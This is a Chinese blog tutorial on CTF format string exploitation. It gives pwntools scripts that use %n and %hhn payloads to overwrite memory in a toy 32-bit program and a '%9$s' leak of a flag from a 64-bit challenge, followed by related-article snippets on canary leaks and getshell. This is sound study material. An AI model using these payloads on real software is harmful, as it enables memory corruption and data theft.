pwn学习-格式化字符串的利用

最新推荐文章于 2025-03-29 20:58:53 发布
最新推荐文章于 2025-03-29 20:58:53 发布
阅读量2.2k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 学习记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38025365/article/details/88315352
本文深入探讨格式化字符串漏洞的原理与利用方法,通过具体示例讲解如何修改栈内存中的变量值,包括覆盖小数字、大数字及任意地址内存。同时,提供了利用格式化字符串漏洞泄露flag的实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

覆盖栈内存 

所用例子

/* example/overflow/overflow.c */
#include <stdio.h>
int a = 123, b = 456;
int main() {
  int c = 789;
  char s[100];
  printf("%p\n", &c);
  scanf("%s", s);
  printf(s);
  if (c == 16) {
    puts("modified c.");
  } else if (a == 2) {
    puts("modified a for a small number.");
  } else if (b == 0x12345678) {
    puts("modified b for a big number!");
  }
  return 0;
}

GCC编译为32位。

首先输入AAAA与若干%p,确定我们输入的字符串在堆栈里的位置。这里数一下发现是第六个参数

所以使用exp

from pwn import *

#sh = process('./overflow')
overflow = ELF('./overflow')
c_addr = int(sh.recvuntil('\n',drop=True),16)

print hex(c_addr)
payload = p32(c_addr)+'%012d' +'%6$n'
sh.sendline(payload)
print sh.recv()
sh.interactive()

即可修改C的值为16,这里因为p32后的c_addr占据4个字节,%012d 为长度为12个字节的整数,不足则以0补全,所以长度加起来为16.所以可以写到第六个参数并且是c的地址里。将C改变为16

覆盖任意地址内存 

覆盖小数字

修改a为小数2

在IDA里查看到a的地址为0x804A028

构造的大概为 aa%k$naa+addr_a k为addr_a所在的参数位置

根据之前看 AAAA在第六个参数,即aa%k 在第六个 $naa即在第七个 所以addr_a在第八个参数

from pwn import *

sh = process('./overflow')
overflow = ELF('./overflow')
c_addr = int(sh.recvuntil('\n',drop=True),16)

payload = 'aa%8$naa' + p32(0x804A028)
sh.sendline(payload)
print sh.recv()
sh.interactive()

修改成功

覆盖大数字

利用%hh 将数字写入单字节地址是关键。

在IDA里找到b的地址

直接exp附注释

from pwn import *

sh = process('./overflow')
overflow = ELF('./overflow')
b_addr = 0x804A02c
payload = p32(b_addr) + p32(b_addr+1) + p32(b_addr+2) + p32(b_addr+3)  #分别向每个地址写入单字节值
#0x78 in b_addr
if len(payload) < 0x78:
	result = 0x78 - len(payload)
elif len(payload) == 0x78:
	result = 0
else:
	result = 256 + 0x78 - len(payload)  #256时候写入为0,所以最终值会模256
payload += '%' + str(result) +'c' + '%6$hhn'
result = 256+0x56-0x78 #因为之前已经输入了0x78个字符,转化为hh单字节字符的值会模256,所以这里的值会变成0x56个。以下类推。
payload +='%' + str(result) +'c' + '%7$hhn'
result = 256+0x34-0x56
payload +='%' + str(result) +'c' + '%8$hhn'
result = 256+0x12-0x34
payload +='%' + str(result) +'c' + '%9$hhn'
sh.sendline(payload)
print sh.recv()
sh.interactive()

 

成功修改,实现了一遍所有的利用,下次做例子。

例子

查看保护,发现开启了canary 与 NX,并且程序为64位

在IDA中查看

很典型的格式化字符串漏洞。

在GDB中调试,并在printf处下断点。

容易看出flag在堆栈里的第四个参数,但是64位参数先使用6个寄存器传递参数再使用堆栈传递参数。

fmt存储在RDI中为第一个参数,所以只需要再便宜9个参数即可到达flag。

即 输入 %9$s  即可泄露flag

exp

sh = process('./goodluck')

payload = '%9$s'

sh.recv()
sh.sendline(payload)
output  = sh.recv()
print output
sh.interactive()

PWN基础-利用格式化字符串漏洞泄露canary结合栈溢出getshell
Welcome To Myon'Blog !
04-27 621
canary 所在地址为 0xffffcffc,内容为 0xe8ac1700。然后运行,期间会经过第一个 read 函数,随便输入:RRR。再看一下 canary 距离我们输入字符串的距离,偏移是 8。重新运行 canary 值会变:现在是 0x37133900。继续往下走,可以发现打印出的值就是 canary 的值。p 只显示了地址,x 还显示了地址处的内容。我们在栈上面找一下 0xe8ac1700。但是测试发现,输出结果多了一个换行符。这部分后面需要填充为垃圾数据。距离栈顶偏移值为 15。
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1991
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
[pwn]格式化字符串:0ctf 2015 login writeup
Breeze的博客
09-26 9434
文章目录格式化字符串:0ctf 2015 login writeup格式化字符串漏洞题目分析利用思路开始利用 格式化字符串:0ctf 2015 login writeup 格式化字符串漏洞 格式化字符串漏洞是不正确的使用printf函数导致的,为了简便使用printf(s),而s是用户可控的字符串,就会导致任意地址读和任意地址写漏洞。**归根结底,由于printf的参数个数是不确定的,而函数本身根...
pwn格式化字符串
最新发布
rjc20051110的博客
03-29 1102
###将s覆盖为目标变量c的地址 由于p32(c)是4字节 再填充12个a 以达到输出16个字节的目的 然后%6$n会将输出的个数也就是16覆盖的第7个参数的位置 而此位置此时已经覆盖上了c的地址 这就成功把16覆盖的c中。表示我们的填充内容,overwrite addr 表示我们所要覆盖的地址,overwrite offset 地址表示我们所要覆盖的地址存储的位置为输出函数的格式化字符串的第几个参数。因为我们的格式化字符串%p,他会根据站上的位置以16位的形式以此解析栈地址上存的数据。
pwn 格式化字符串漏洞及例题
limenzzz的博客
10-21 2203
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
pwn入门--格式化字符串
yjh_fnu_ltn的博客
07-11 1053
gdb格式化字符串在栈上的位置的,就是偏移。
[pwn] 7.格式化字符串
H4ppyD0g的博客
09-01 726
a
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
qq_66013948的博客
03-05 1636
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 1589
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
PWN学习格式化字符串及CTF常见利用手法
蚁景网安学院
02-18 1490
格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中 printf、sprintf、fprintf 等函数用于将数据格式化字符串并进行输出。当这些函数的格式字符串参数(比如 %s、%d等)由用户提供时,如果未正确地对用户提供的输入进行验证和过滤,就可能存在格式化字符串漏洞。
noxCTF-pwn1-格式化字符串
Peanuts
09-09 639
格式化字符串 额额博客爆炸。。之前写的都没了懒得再写一遍了太坑了这博客就发个wp吧,过程就是远程泄漏ret地址,因为没有开alsr from pwn import * context.log_level='debug' elf = ELF('./believeMe.dms') libc = elf.libc p = remote('18.223.228.52',13337) #p = pr...
格式化字符串漏洞入门简述(含例子:攻防世界pwn新手题GCfsb)
ins_Digger的博客
10-30 1224
##本文参考的文章有如下的博客(实在太菜,所以花了好长时间去练习,找题,看博客才稍微有一点点明白,其实还是不是特别明白) https://www.freebuf.com/column/207425.html 《黑客攻防技术宝典:系统篇》第四章 格式化字符串漏洞的简单概述 学过 c 语言应该就会知道printf()函数的使用方法,如下图: int main(){ char str[100]; s...
Pwn 学习 格式化字符串
MrTreebook的博客
08-19 1815
每一种 pattern 的含义请具体参考维基百科的格式化字符串。以下几个 pattern 中的对应选择需要重点关注。可以看到%10p的作用是直接打印第十个%p位置上的指针内容。通过格式化字符串可以无限泄露栈上的数据。
菜鸟PWN手进阶之格式化字符串
re1wn
01-05 6585
菜鸟PWN手进阶之格式化字符串
PWN入门(8)格式化字符串漏洞
Ba1_Ma0的博客
09-26 1004
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入07文件夹还是和上一篇文件一样,设置文件权限,将flag设置位只能root可读设置程序位suid位。
pwn格式化字符串漏洞小结
PLpa的博客
11-30 2707
格式化字符串漏洞 0x00.前言 在pwn中,格式化字符串漏洞是一个非常基础的漏洞,他通常穿插在各种漏洞之中。比如,当程序开了PIE保护时,在栈溢出之前,我们先可以运用格式化字符串漏洞获取栈中的信息;通过格式化字符串漏洞的任意地址写,我们可以把栈帧劫持到堆地址上;我们甚至可以直接通过任意地址写,劫持got表,实现getshell…… 总而言之,格式化字符串漏洞虽然在目前市面上的软件中比较难以看到,...
格式化字符串类盲pwn的dump方法
weixin_46483787的博客
04-11 747
有一类题目,不会给任何文件,只给一个ip和端口,这种称为blind pwn(盲pwn),如果这类pwn存在格式化字符串漏洞的话,可以通过一些手法拿到整个二进制程序,这对我们的逆向分析和解题是十分重要的,举个例子: 在2022年的Insomni’hack teaser比赛上,有一道题CovidLe$s,就是一道盲pwn,输入什么就回显什么,但是存在格式化字符串漏洞,并且应该是栈上的,通过不断的尝试是可以大致猜测出栈结构的: 从偏移12开始是栈上的缓冲区,29那里是canary,31是返回地址,根据后三位可以
PWN基础5:格式化字符串漏洞(一) 概述 及 调试
prettyX的博客
07-09 810
漏洞概述 在C语言中,常用的输出函数有printf、fprintf、vprintf、vfprintf、sprintf等。对于这些输出函数,Format String是其第一个参数,一般称之为格式化字符串 格式化字符串在输出函数中的解析过程: ...
pwn格式化字符串的浅显理解
javagty6778的博客
03-19 295
这时候可以输入格式化字符 %d,%p等控制函数的输出。2.### 简单解释格式化字符串原理1.这是两段程序的源码:* 1️⃣。2.对应的汇编代码:* 1️⃣。
pwn题目不用格式化字符串如何绕开pie
03-04
### 绕过PIE保护的方法 在解决CTF中的pwn题目时,当面对启用位置独立执行(Position Independent Execution, PIE)保护的目标程序,可以采用多种技术来绕过这种安全机制。下面介绍几种常见且有效的策略。 #### 利用已知地址泄露 如果目标二进制文件存在某些方式能够泄漏栈上数据或库函数指针,则可以通过这些信息计算出加载基址偏移量从而定位其他所需 gadget 或者 libc 函数的位置[^1]。 ```c // 假设我们已经获取到了某个固定偏移处的数据 leak_value unsigned long base_addr = leak_value - known_offset; ``` #### 返回导向编程 (ROP) 通过构建 ROP 链可以在不知道确切内存布局的情况下调用系统命令或者其他有用的操作。对于启用了ASLR和PIE的情况,通常需要先找到一种方法来泄露出一些有用的地址以便后续操作。一旦获得了足够的信息就可以利用ropgadget工具自动生成所需的链表。 #### 动态链接器特性 Linux下的动态链接器`ld.so`本身也是共享对象的一部分,并且其路径通常是固定的(`/lib/ld-linux-x86-64.so.2`)。因此,在某些情况下可以直接尝试解析并控制该组件的行为以实现攻击目的。这可能涉及到覆盖got表条目指向特定于环境设置的辅助向量(`AT_SYSINFO`, `AT_HWCAP`等)。 #### 使用环境变量 有时还可以借助外部输入如环境变量来进行间接跳转。例如,可以通过设置特殊的环境变量名使得程序内部逻辑发生改变进而触发预期之外的功能调用序列。这种方法依赖具体的应用场景以及是否存在可被操控的地方。 ```bash export SYSTEM_CALL="malicious_command" ./vulnerable_program ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值